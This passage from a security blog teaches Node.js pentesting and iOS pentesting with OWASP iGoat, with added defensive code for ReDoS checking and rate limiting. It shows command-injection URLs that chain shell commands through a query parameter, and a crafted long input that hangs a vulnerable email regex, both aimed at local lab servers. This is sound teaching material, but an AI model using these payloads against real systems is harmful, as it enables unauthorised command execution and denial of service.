I am not going into the basics of command execution; if you want to know more about OS command execution, please go through <a href="https://www.slideshare.net/bhati123/owasp-pune-chapter-dive-into-the-profound-web-attacks-58494512?qid=daa6aef7-822a-4a07-841e-d62de04ddaa9&v=&b=&from_search=2" target="_blank">this slide deck</a>.</div>
<div>
<br /></div>
<div>
<b><br /></b></div>
<div>
A typical simple OS command execution is entering a semicolon after the value and injecting further commands:</div>
<div>
<br /></div>
<div>
<b>http://127.0.0.1:8005/?inject=google.com ; ls</b></div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikRIux4KJ-wVn8cFo-o8hsudQZ9iXWPqqd9-STndsLwie5V3AKAOUMDt9nhdCFWK90osvowO5zj9FEZ_4i40C15FsGsffkJDti74YwgULVjREi05QHUoFwOw26xvwWEusoQwkhlB6nSSY/s1600/Screen+Shot+2017-04-23+at+4.18.56+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikRIux4KJ-wVn8cFo-o8hsudQZ9iXWPqqd9-STndsLwie5V3AKAOUMDt9nhdCFWK90osvowO5zj9FEZ_4i40C15FsGsffkJDti74YwgULVjREi05QHUoFwOw26xvwWEusoQwkhlB6nSSY/s640/Screen+Shot+2017-04-23+at+4.18.56+PM.png" width="640" /></a></div>
<div>
We can pass multiple commands at once.</div>
<div>
<br /></div>
<div>
<b>http://127.0.0.1:8005/?inject=google.com ; whoami ; pwd ; ls -al</b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinHFEhhFfORlm8oe4ccRAv2pVu7NNL1Smbf9CzPrl-HzW-UjGnKjXHKkcteHzekCNrmnPMDJWEGqG63Ka0PQbAm_Kw5pUyGzPshsTC_-0OAdAiXfbnguxR5nrgBw8A3w_mLM6oouG0QQo/s1600/Screen+Shot+2017-04-23+at+4.24.20+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinHFEhhFfORlm8oe4ccRAv2pVu7NNL1Smbf9CzPrl-HzW-UjGnKjXHKkcteHzekCNrmnPMDJWEGqG63Ka0PQbAm_Kw5pUyGzPshsTC_-0OAdAiXfbnguxR5nrgBw8A3w_mLM6oouG0QQo/s640/Screen+Shot+2017-04-23+at+4.24.20+PM.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<b><br /></b></div>
<div>
<div class="separator" style="clear: both;">
<b>3) RegExp DOS Vulnerability</b></div>
<div class="separator" style="clear: both;">
<b><br /></b></div>
<div class="separator" style="clear: both;">
According To <b><a href="https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS" target="_blank">OWASP</a></b></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
The Regular expression Denial of Service (ReDoS) is a Denial of Service attack, that exploits the fact that most Regular Expression implementations may reach extreme situations that cause them to work very slowly (exponentially related to input size). An attacker can then cause a program using a Regular Expression to enter these extreme situations and then hang for a very long time.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
In short, an attacker can abuse the regular expression validation by sending a large amount of crafted data, which tricks the application into consuming a large share of server resources, resulting in unavailability of the service/application for other users.</div>
</div>
<div>
<b><br /></b></div>
<div>
<b>[ nodejsregexp.js]</b></div>
<div>
<b><br /></b></div>
<div>
<div style="font-weight: bold;">
var http = require("http");</div>
<div style="font-weight: bold;">
var url = require("url");</div>
<div style="font-weight: bold;">
http.createServer(function(request, response)</div>
<div style="font-weight: bold;">
{</div>
<div style="font-weight: bold;">
var starttime = process.hrtime();</div>
<div style="font-weight: bold;">
// nested quantifiers of the form (group)+ make this expression backtrack exponentially on crafted input</div>
<div style="font-weight: bold;">
var emailExpression = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;</div>
<div style="font-weight: bold;">
var parsedUrl = url.parse(request.url, true);</div>
<div style="font-weight: bold;">
response.writeHead(200, {"Content-Type": "text/html"});</div>
<div style="font-weight: bold;">
// the email parameter is tested as-is, with no length limit</div>
<div style="font-weight: bold;">
response.write("Email Validation : " + emailExpression.test(parsedUrl.query.email));</div>
<div style="font-weight: bold;">
response.write("&lt;br /&gt;Server Response Time: " + process.hrtime(starttime));</div>
<div style="font-weight: bold;">
response.end();</div>
<div style="font-weight: bold;">
}).listen(8006);</div>
<div style="font-weight: bold;">
<br /></div>
<div>
The following regex, <span style="font-weight: bold;">var emailExpression = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;</span>, is vulnerable to a DoS attack: an attacker can pass a very long input to the application, which causes service/application unavailability.</div>
<div>
<br /></div>
<div>
For DoSing:</div>
<div>
<br /></div>
<div>
<b>http://127.0.0.1:8006/?email=narealshdlhasldhlashkldhalshdlkahslkdhklashldhalkshdklahskldhklashkldhaklshdklhalshdlahslhdhasklkhdlkahdndra.bhagdkjgkasgkdgakjsgdjkgaskgdjkagskdgjkasgjkdgjasgdgjkasgjdgjaksgjkdgjaksgkdgjaksjkgdgjaksjgkdgajksgdjkagjskdgjkajsgkdgjkasjgkdadati@websasdasdaksdgakjsgdkgajksgdjkagsjkdgajkgdjkagksdgjkasgjkdgjasjkdjkagjkdgagkasjdadecgeeks.caskdhahldkhalkshdklahsldhklashdlhaklshdlahsldhlkahsdhlashdhaklshdhaklshdklahslhdkahsdhkahsldhaskhldhalshdhlashdasdom%%%%////</b></div>
<div>
<b><br /></b></div>
<div>
This large input causes the application to consume a lot of server resources.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5y3aqVj1uCANJe163JZDypTWTkcLMbDfnm_vVfQnzmLIxCxUe2te-3UXTPxSUgF8EB3YSlWQleRgPXyb_ZnPJXsEqOowww-OhpUl9llRzAfX0l9peSQSraUhU-yoHaaiY2qxYEbNIuiw/s1600/Screen+Shot+2017-04-23+at+5.22.44+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5y3aqVj1uCANJe163JZDypTWTkcLMbDfnm_vVfQnzmLIxCxUe2te-3UXTPxSUgF8EB3YSlWQleRgPXyb_ZnPJXsEqOowww-OhpUl9llRzAfX0l9peSQSraUhU-yoHaaiY2qxYEbNIuiw/s640/Screen+Shot+2017-04-23+at+5.22.44+PM.png" width="640" /></a></div>
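<div>
As an added example (not code from the original post), the block below shows what makes the emailExpression above dangerous and how to fix it. It contains a simplified version of the check the safe-regex package performs (a repeating quantifier applied to a group that itself contains a repeating quantifier), run against the regex from nodejsregexp.js, and a hardened validateEmail() that caps input length before running a regex with no nested repetition. The function names and the 2-4 letter TLD assumption in the replacement regex are mine.</div>

```javascript
// Added example (not from the original post): a simplified version of the
// check that the safe-regex npm package performs (nested repetition, also
// called star height above 1), applied to the regex from nodejsregexp.js, plus
// a hardened validateEmail() that caps input length and uses a regex with no
// nested quantifiers. Only plain groups, (?:...) groups, character classes,
// escapes and the +, *, ?, {n,m} quantifiers are handled by the checker.

// The expression from the page's nodejsregexp.js.
const VULNERABLE_EMAIL_RE = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

// Replacement: each repeated element is a single character class, so the
// engine never has to choose how to split the input between two repetitions.
// (Assumption: a 2-4 letter top-level domain is acceptable for this app.)
const SAFE_EMAIL_RE = /^[a-zA-Z0-9_.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}$/;

// SMTP (RFC 5321) limits an address to 254 characters; rejecting longer input
// before the regex runs bounds the work any single request can cause.
const MAX_EMAIL_LENGTH = 254;

// True when quantifier text (+, *, {n}, {n,}, {n,m}) allows more than one copy.
function isRepeating(q) {
  if (q === '+' || q === '*') return true;
  const m = /^\{(\d+)(?:,(\d*))?\}$/.exec(q);
  if (!m) return false;                              // '?' allows at most one copy
  if (m[2] === undefined) return Number(m[1]) > 1;   // {n}
  return m[2] === '' || Number(m[2]) > 1;            // {n,} or {n,m}
}

// Returns the quantifier starting at src[i], or null if there is none.
function readQuantifier(src, i) {
  const c = src[i];
  if (c === '+' || c === '*' || c === '?') return c;
  if (c === '{') {
    const close = src.indexOf('}', i);
    if (close === -1) return null;
    const text = src.slice(i, close + 1);
    return /^\{\d+(,\d*)?\}$/.test(text) ? text : null;   // '{' can also be a literal
  }
  return null;
}

// Walks the regex source and reports a repeating quantifier applied to a
// group that already contains a repeating quantifier, the classic ReDoS shape.
function hasNestedQuantifier(src) {
  const open = [];   // stack of enclosing groups: { repeatsInside: boolean }
  let i = 0;
  while (src.length > i) {
    const c = src[i];
    let closed = null;                                     // group this atom closes
    if (c === '\\') {
      i += 2;                                              // escaped character
    } else if (c === '[') {                                // character class
      i += 1;
      while (src.length > i && src[i] !== ']') i += src[i] === '\\' ? 2 : 1;
      i += 1;
    } else if (c === '(') {
      open.push({ repeatsInside: false });
      i += src.startsWith('(?:', i) ? 3 : 1;
      continue;                                            // a group opener takes no quantifier
    } else if (c === ')') {
      closed = open.pop();
      i += 1;
    } else {
      i += 1;                                              // literal, anchor or alternation
    }
    const q = readQuantifier(src, i);
    if (q === null) continue;
    i += q.length;
    if (src[i] === '?') i += 1;                            // lazy modifier
    if (!isRepeating(q)) continue;
    if (closed && closed.repeatsInside) return true;
    for (const g of open) g.repeatsInside = true;
  }
  return false;
}

// Hardened validator: bounded input size, then a regex without nested repetition.
function validateEmail(input) {
  if (typeof input !== 'string' || input.length > MAX_EMAIL_LENGTH) return false;
  return SAFE_EMAIL_RE.test(input);
}
```

<div>
The checker flags both <b>(([a-zA-Z0-9\-])+\.)+</b> and <b>([a-zA-Z0-9]{2,4})+</b> in the page's expression and passes the replacement. The block deliberately never runs the vulnerable regex on a long non-matching input, because that is exactly what hangs the process. Star height is a heuristic: some nested patterns are harmless and some flat ones are still quadratic, so the length cap stays in place regardless of which regex is used.</div>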
<div>
<br /></div>
<div>
<b><br /></b></div>
<div>
<span style="font-weight: bold;"><br /></span></div>
<div style="text-align: center;">
For a better understanding, I have created a video.</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/ovEY6M06eqY/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/ovEY6M06eqY?feature=player_embedded" width="320"></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div>
<br /></div>
<div style="font-weight: bold;">
<b>4) Brute Force/Rate Limit Protection</b></div>
<div style="font-weight: bold;">
<br /></div>
<div>
I have already discussed rate limiting in an earlier <a href="http://www.websecgeeks.com/2015/06/bypass-brute-force-protection-login.html" target="_blank">post here</a>.</div>
<div>
<br /></div>
<div>
While pentesting a NodeJS application, always look for endpoints where a brute-force/wordlist attack is possible, for example:</div>
<div>
<br /></div>
<div>
<b>A) Forgot Your Password Form : </b>Try to enumerate existing users.</div>
<div>
<b>B) OTP : </b>OTPs are mostly used for password reset, mobile verification and account creation.</div>
<div>
<b>C) Password Reset Code : </b>Sometimes password reset tokens may be brute-forceable.</div>
<div>
<br /></div>
<div>
<b>5) NPM </b></div>
<div>
<br /></div>
<div>
The npm packages an application depends on may carry known vulnerabilities. Here the Node Security Project comes to the rescue.</div>
<div>
Using the nsp tool, we can look for known vulnerabilities in those packages. (nsp has since been retired; its advisory data now feeds the built-in <b>npm audit</b> command, which serves the same purpose.)</div>
<div>
<br /></div>
<div>
The following command will install nsp.</div>
<div>
<br /></div>
<div>
<b>npm i nsp -g</b> [This will install nsp]</div>
<div>
<b>nsp check module-name-to-audit</b> [This will check the named module for known vulnerabilities]</div>
<div>
<b>Or</b></div>
<div>
<b>nsp check module-name-to-audit.json</b></div>
<div>
<b><br /></b></div>
<div>
<b>6) Automated Scan</b></div>
<div>
<b><br /></b></div>
<div>
We can use <a href="https://github.com/ajinabraham/NodeJsScan" target="_blank">NodeJSScan</a> for automated vulnerability scanning. </div>
<div>
<br /></div>
<div>
<br /></div>
<div style="text-align: center;">
<b>Security Prevention </b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<div style="text-align: left;">
<ul style="text-align: left;">
<li>Deploy rate limiting to prevent brute-force attacks against authentication. One way to do this is to use the StrongLoop API Gateway to enforce a rate-limiting policy, or middleware such as express-limiter.</li>
<li>Use the csurf middleware for CSRF protection.</li>
<li>Always filter and sanitize user input to protect against most vulnerabilities, such as SQL injection, XSS and command injection.</li>
<li>Use the nmap and sslyze tools to test your SSL/TLS configuration.</li>
<li>Use safe-regex to check regular expressions for ReDoS-prone patterns.</li>
<li>Do not expose sensitive information on the client side.</li>
<li>Perform proper error handling to prevent information disclosure.</li>
<li><strong>Strict-Transport-Security</strong> enforces secure (HTTP over SSL/TLS) connections to the server.</li>
<li><strong>X-Frame-Options</strong> provides clickjacking protection.</li>
<li><strong>X-XSS-Protection</strong> enables the cross-site scripting (XSS) filter built into most recent web browsers.</li>
<li><strong>X-Content-Type-Options</strong> prevents browsers from MIME-sniffing a response away from the declared content type.</li>
<li><strong>Content-Security-Policy</strong> prevents a wide range of attacks, including cross-site scripting and other cross-site injections.</li>
</ul>
</div>
</div>
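<div>
As an added example (not code from the original post) covering item 4 above and the first bullet of the prevention list, here is a small in-memory sliding-window rate limiter with an Express-style middleware that limits login, OTP and password-reset attempts both per client IP and per target account. The class and function names are mine, and the limits used in the comments are illustrative; a multi-process deployment would keep the counters in a shared store such as Redis instead of a per-process Map.</div>

```javascript
// Added example (not from the original post): an in-memory sliding-window
// rate limiter for login-style endpoints (login, password reset, OTP),
// applied per client IP and per account so that neither one IP trying many
// accounts nor many IPs trying one account gets unlimited attempts.
class SlidingWindowLimiter {
  // now() is injectable so behaviour can be tested without real waiting.
  constructor({ limit, windowMs, now = Date.now }) {
    this.limit = limit;
    this.windowMs = windowMs;
    this.now = now;
    this.hits = new Map();   // key -> ascending list of attempt timestamps
  }

  // Records one attempt for key and reports whether it is within the limit.
  check(key) {
    const now = this.now();
    const cutoff = now - this.windowMs;
    const recent = (this.hits.get(key) || []).filter(t => t > cutoff);
    if (recent.length >= this.limit) {
      this.hits.set(key, recent);
      return { allowed: false, remaining: 0, retryAfterMs: recent[0] + this.windowMs - now };
    }
    recent.push(now);
    this.hits.set(key, recent);
    return { allowed: true, remaining: this.limit - recent.length, retryAfterMs: 0 };
  }

  // Drops keys with no attempts inside the window so the map cannot grow forever.
  prune() {
    const cutoff = this.now() - this.windowMs;
    for (const [key, times] of this.hits) {
      if (!times.some(t => t > cutoff)) this.hits.delete(key);
    }
  }
}

// Express-style middleware. ipLimiter guards the source address (for example
// 20 attempts per minute), userLimiter guards the target account (for example
// 5 per minute); a request must pass both. Only trust X-Forwarded-For instead
// of the socket address when the app sits behind a proxy you control.
function bruteForceGuard(ipLimiter, userLimiter) {
  return function (req, res, next) {
    const ip = req.socket.remoteAddress;
    const user = String((req.body && req.body.username) || '').toLowerCase();
    const byIp = ipLimiter.check('ip:' + ip);
    const byUser = user ? userLimiter.check('user:' + user) : { allowed: true, retryAfterMs: 0 };
    if (byIp.allowed && byUser.allowed) return next();
    const waitMs = Math.max(byIp.retryAfterMs, byUser.retryAfterMs);
    res.statusCode = 429;
    res.setHeader('Retry-After', String(Math.ceil(waitMs / 1000)));
    res.end('Too many attempts, try again later');
  };
}

module.exports = { SlidingWindowLimiter, bruteForceGuard };
```

<div>
Mount the guard only on the authentication routes (app.post('/login', bruteForceGuard(ipLimiter, userLimiter), handler)) and call prune() from a periodic timer. The per-account limiter is what stops the user enumeration and OTP guessing described in item 4 even when the attacker spreads requests across many source addresses; the per-IP limiter catches the single-source wordlist case.</div>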
<div>
<b><br /></b></div>
<div>
</div>
<div>
<b>That is all about Pentesting Node.js Applications: Node.js Application Security. If you found this post useful, please like & share.</b><br />
<b>Thanks.</b></div>
<div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
</div>
<div style="font-weight: bold;">
<b><br /></b></div>
</div>
</div>
Narendra Bhati, 2017-04-23: iOS Application Pentesting Part 5 : Insecure HTTP Data Transit <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3wfSM7A_-5EXh6PCH1-0KrNsadI9exwLYh9hyH24qt8YBLaXg-Bm7pLiRVoXjNyA6ew4GqnKc5WDIInEyPKUMXsuCqogz3gPjjGe6o_iMFfQygxpLlz3SrvuusGjc6SSK7QUl0eBNEt4/s1600/http-insecure.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3wfSM7A_-5EXh6PCH1-0KrNsadI9exwLYh9hyH24qt8YBLaXg-Bm7pLiRVoXjNyA6ew4GqnKc5WDIInEyPKUMXsuCqogz3gPjjGe6o_iMFfQygxpLlz3SrvuusGjc6SSK7QUl0eBNEt4/s640/http-insecure.jpg" width="640" /></a></div>
<br />
<br />
Just like <a href="https://www.owasp.org/index.php/Testing_for_Sensitive_information_sent_via_unencrypted_channels_(OTG-CRYPST-003)#Example_2:_Form-Based_Authentication_Performed_over_HTTP" target="_blank">Transmitting Sensitive Credentials Over HTTP</a>, applications which use HTTP to communicate with their server and do not use any kind of encryption are vulnerable to this issue.<br />
<br />
The iGoat application has a simple demonstration in which the username & password entered in the app are transmitted over HTTP without any encryption; as a result an attacker can capture/sniff those packets and hijack the victim's account.<br />
<a name='more'></a><br />
Open the iGoat app, go to <b>Data Protection ( Transit ) </b>and then select <b>Server Communication</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg71jMlrTK86VJP9E0SwPUnmZ4QtJngsVVcbSbg9fsX1zJVQ_ftLdKUax0Hl-i7tP9ii3aO9THnDWevBz9eQIK4tmIrNnYHY3VbuCFK7orwx8S2QoFzJQCyC0E03v-11i5j2ImZE9n-dHQ/s1600/Screen+Shot+2017-04-22+at+6.14.38+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg71jMlrTK86VJP9E0SwPUnmZ4QtJngsVVcbSbg9fsX1zJVQ_ftLdKUax0Hl-i7tP9ii3aO9THnDWevBz9eQIK4tmIrNnYHY3VbuCFK7orwx8S2QoFzJQCyC0E03v-11i5j2ImZE9n-dHQ/s640/Screen+Shot+2017-04-22+at+6.14.38+PM.png" width="378" /></a></div>
<b><br /></b>
<b><br /></b>
On the other side, don't forget to run the iGoat app's Ruby server.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikKqRii4vY53fwT-CK31MpqNJIzIRnrg-Bm6pKyU6Z8GRVfQeNaIGTL1KVUG_7v1znyDkTi6-IeLw4ZN9jZ7h2TYkWrNUkqmM53SIj90hZJZ0mXdXDH_9bG_fvwJXkr5-5XVxtfzCxAdg/s1600/Screen+Shot+2017-04-22+at+6.15.02+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikKqRii4vY53fwT-CK31MpqNJIzIRnrg-Bm6pKyU6Z8GRVfQeNaIGTL1KVUG_7v1znyDkTi6-IeLw4ZN9jZ7h2TYkWrNUkqmM53SIj90hZJZ0mXdXDH_9bG_fvwJXkr5-5XVxtfzCxAdg/s640/Screen+Shot+2017-04-22+at+6.15.02+PM.png" width="640" /></a></div>
<br />
<br />
Now go to the application, enter any credentials and hit the submit button. After hitting submit, the output will look like this.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA7KY1P4Wcx8JlSSmkiOIvgZs42bvLf9mUjDCstrVqWPZoUUGoMtQM0mI0wRL7EsyVWVnsBYW0-yV7BKcRZrgeHoPDuyrHw0MO0Vpz8Gwx-qozkP0etpFV_k38RRPjiR3-on4w8BxNQYs/s1600/Screen+Shot+2017-04-22+at+6.18.04+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA7KY1P4Wcx8JlSSmkiOIvgZs42bvLf9mUjDCstrVqWPZoUUGoMtQM0mI0wRL7EsyVWVnsBYW0-yV7BKcRZrgeHoPDuyrHw0MO0Vpz8Gwx-qozkP0etpFV_k38RRPjiR3-on4w8BxNQYs/s640/Screen+Shot+2017-04-22+at+6.18.04+PM.png" width="374" /></a></div>
<br />
In the background, our Ruby iGoat server demonstrates the attack scenario: the user's credentials are captured by the attacker in plain text.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_-nauujF2r9gSMpWT_ljKvoiTZBGaoZce_jcLR8IwAFbnqvAnIuMPGajmjbFERXZLuDb9_dPuWDl3fBzYCtm5REIYCgry3rt0sXhNyMGSPbhBeOp_baZfRa3hWc_73xqh96FvCt_jKxE/s1600/Screen+Shot+2017-04-22+at+6.19.56+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_-nauujF2r9gSMpWT_ljKvoiTZBGaoZce_jcLR8IwAFbnqvAnIuMPGajmjbFERXZLuDb9_dPuWDl3fBzYCtm5REIYCgry3rt0sXhNyMGSPbhBeOp_baZfRa3hWc_73xqh96FvCt_jKxE/s640/Screen+Shot+2017-04-22+at+6.19.56+PM.png" width="640" /></a></div>
<br />
<br />
You can do the same during a real penetration-testing engagement: on your device, set up a Burp proxy or use Wireshark to demonstrate this vulnerability by observing the credentials in clear text.<br />
<a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-5.html" target="_blank">&lt;&lt;Previous Post</a><br />
iOS Application Pentesting Part 4 :<br />
Installing iGoat Application<br />
<br />
<br /></div>
Narendra Bhati, 2017-04-16: iOS Application Pentesting Part 4 : Installing iGoat Application<div dir="ltr" style="text-align: left;" trbidi="on">
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgikQlHazuDqsvpx6d9KSjun2lge__eE69sWA66EBgm27ejhdrPaaYMkf0bu2DC-b5a0-RgL9-WRtJTTC-O2kYyJYHe_5wN1P6DtUgqVZJNrQXhCGDvta1c_RWTrl5jMU9jAWDbksg_wao/s1600/Screen+Shot+2017-04-16+at+7.46.02+PM.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgikQlHazuDqsvpx6d9KSjun2lge__eE69sWA66EBgm27ejhdrPaaYMkf0bu2DC-b5a0-RgL9-WRtJTTC-O2kYyJYHe_5wN1P6DtUgqVZJNrQXhCGDvta1c_RWTrl5jMU9jAWDbksg_wao/s640/Screen+Shot+2017-04-16+at+7.46.02+PM.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Picture taken from : https://www.owasp.org/index.php/OWASP_iGoat_Project</td></tr>
</tbody></table>
<br />
For hands-on practice and learning we will use the iGoat iOS application, part of the OWASP project. You can find its GitHub page <a href="https://github.com/OWASP/igoat" target="_blank">here</a>. This mobile application is deliberately vulnerable, designed for security professionals and learners to enhance their iOS application pentesting skills.<br />
<br />
This project is maintained by the following people:<br />
Swaroop<br />
masbog<br />
mtesauro<br />
DinisCruz<br />
<br />
Here are the project details:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv3liKCgukd1fllG3GO2m_l4ML6iryvBgCEf_FnyzOb6Z6ms692dLtWpphngaNil9kE06lXmnIa9iOZ35-HK_zFniRdPyPNrO50dZJi-668X8i03vhxHV3a8vHwqXq0bfks18mYVM-HcA/s1600/iGoat+v.2.5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgv3liKCgukd1fllG3GO2m_l4ML6iryvBgCEf_FnyzOb6Z6ms692dLtWpphngaNil9kE06lXmnIa9iOZ35-HK_zFniRdPyPNrO50dZJi-668X8i03vhxHV3a8vHwqXq0bfks18mYVM-HcA/s640/iGoat+v.2.5.png" width="356" /></a></div>
<br />
<br />
For the later exercises we will install this application in Xcode and run it, but I recommend using a physical device when performing pentesting.<br />
<a name='more'></a><br />
1) The first step is to download the vulnerable iOS app.<br />
Go to this URL - <a href="https://github.com/OWASP/igoat" target="_blank">https://github.com/OWASP/igoat </a>and click "Download as ZIP" on the page.<br />
<br />
2) Unzip the downloaded file and you will get a folder: <b>igoat-master</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg99s_YSm6bLxtr0uG22ukLzKRW8lKwmOGKQIYt4l-XDgIVuMow36RmQPBKpQcBONdfLYwHT39v-46qZTY2aDx_Sg0JW9aE2FqJGKOJnHcjg3TOyJaj5YRcQInxrgQL40Qct2rFHHZ887s/s1600/Screen+Shot+2017-04-16+at+8.21.11+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg99s_YSm6bLxtr0uG22ukLzKRW8lKwmOGKQIYt4l-XDgIVuMow36RmQPBKpQcBONdfLYwHT39v-46qZTY2aDx_Sg0JW9aE2FqJGKOJnHcjg3TOyJaj5YRcQInxrgQL40Qct2rFHHZ887s/s400/Screen+Shot+2017-04-16+at+8.21.11+PM.png" width="400" /></a></div>
<br />
3) Now go to the igoat-master folder, then the<b> iGoat </b>folder. Here you will find an Xcode project file,<br />
<b>iGoat.xcodeproj</b>. Open this file in Xcode.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS0pvypWVV6n4_NHsZ4xfRz8RMx2ti4z8p329xuPiTwb3_WGdVJs2ZIqyZei6UkLEAO6c7ZJsV0WAd-ef-5hqFH_a0CpgK0KBQKh6Gnm3wyWzS1MTWpcSUFc99vBepHL39foHsFx0sgDI/s1600/Screen+Shot+2017-04-16+at+8.22.53+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiS0pvypWVV6n4_NHsZ4xfRz8RMx2ti4z8p329xuPiTwb3_WGdVJs2ZIqyZei6UkLEAO6c7ZJsV0WAd-ef-5hqFH_a0CpgK0KBQKh6Gnm3wyWzS1MTWpcSUFc99vBepHL39foHsFx0sgDI/s640/Screen+Shot+2017-04-16+at+8.22.53+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
3) Now select the device in the top-left panel: iPhone 5, 6 or 7, whichever you want ;)</div>
<div class="separator" style="clear: both; text-align: left;">
In my case it is iPhone 6.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw_n6dHNr3hdO0hqo7vQJ53g_pIP0WmTmYmgh1NiL4BF6TeqokmgnND1C7eufvM94bYljnbvSaPeRbfAxcR4cIR7Ae-PbJ_z1C9fPiqzCEa37OUfjuXRvtS-QzvcMitArnSJdL0ehyphenhyphenpLQ/s1600/Screen+Shot+2017-04-16+at+8.24.22+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw_n6dHNr3hdO0hqo7vQJ53g_pIP0WmTmYmgh1NiL4BF6TeqokmgnND1C7eufvM94bYljnbvSaPeRbfAxcR4cIR7Ae-PbJ_z1C9fPiqzCEa37OUfjuXRvtS-QzvcMitArnSJdL0ehyphenhyphenpLQ/s640/Screen+Shot+2017-04-16+at+8.24.22+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
4) Now click the play button to the left of this device selector; as a result you will see a large simulator window running our iGoat application.<br />
<div class="separator" style="clear: both; text-align: center;">
